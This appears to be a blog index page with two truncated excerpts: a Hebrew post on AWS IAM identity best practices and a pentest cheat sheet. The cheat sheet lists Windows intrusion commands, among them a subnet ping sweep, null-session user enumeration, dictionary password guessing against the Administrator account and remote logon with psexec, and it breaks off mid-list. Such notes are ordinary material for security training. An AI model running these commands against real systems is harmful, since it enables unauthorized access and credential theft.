המלצות לניהול זהויות נכון בAWS IAM  1) הגבלת השימוש בחשבון הבסיס של AWS כאשר רושמים חשבון  AWS חשבון המשתמש ההתחלתי שנוצר נקרא חשבון root  לחשבון זה יש גישה מלאה לכל משאב של AWS כולל פרטי חיוב, מה שהופך אותו לחשבון המשתמש החסוי ביותר. מאחר שאין אפשרות להגביל את הרשאות אישורי חשבון הבסיס, מומלץ לגשת אל […]

Read More →

Pingsweep of subnet: # nmap -sP 10.0.0.1-255 Get a list of users on Windows: > net use \x.x.x.xipc$ “” /USER:”” > net users What is the password policy: > net accounts Recover a lost password: > enum -u Aministrator -f c:dict.txt -D x.x.x.x Logon remotely: > psexec \x.x.x.x -u Administrator cmd.exe Transfer a file with […]

Read More →